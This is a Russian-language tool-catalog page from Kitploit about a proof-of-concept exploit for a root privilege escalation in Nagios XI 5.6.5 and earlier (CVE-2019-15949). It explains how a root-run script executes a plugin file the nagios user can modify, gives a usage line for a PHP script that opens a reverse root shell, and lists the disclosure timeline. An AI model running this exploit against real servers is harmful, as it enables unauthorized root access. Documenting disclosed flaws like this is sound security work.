Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
nagiosxi-root-rce-exploit — PoC, эксплуатирующий уязвимость в Nagios XI (5.6.5) для получения root-оболочки | Kitploit
Инструменты/GitHubGitHub/jakgibb/nagiosxi-root-rce-exploit
Повышение привилегийЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubjakgibb/nagiosxi-root-rce-exploit

nagiosxi-root-rce-exploit

PoC, эксплуатирующий уязвимость в Nagios XI (5.6.5) для получения root-оболочки

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
1675 лет назадЕщё не проверено

nagiosxi-root-exploit

Обзор

В Nagios XI <= 5.6.5 существует уязвимость, позволяющая злоумышленнику использовать RCE для повышения привилегий до root.
Для эксплуатации требуется доступ к серверу под пользователем 'nagios' или доступ к CCM через веб-интерфейс с правами на управление плагинами.

Детали

Скрипт getprofile.sh, вызываемый при загрузке системного профиля (profile.php?cmd=download), выполняется от имени root через запись sudo без пароля; скрипт запускает исполняемый файл 'check_plugin', принадлежащий пользователю nagios. Пользователь, вошедший в Nagios XI с правами на изменение плагинов, или пользователь 'nagios' на сервере может изменить исполняемый файл 'check_plugin' и вставить вредоносные команды, выполняемые от имени root.

PoC

Был разработан PHP PoC, который загружает полезную нагрузку, приводящую к обратному root-шеллу.
Использование:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port

Раскрытие

Сообщено в Nagios: 29 июля 2019
Подтверждено Nagios: 29 июля 2019
Исправлено в версии: 5.6.6 — 20 августа 2019
CVE присвоен: 6 сентября 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

alt text

Скачать инструмент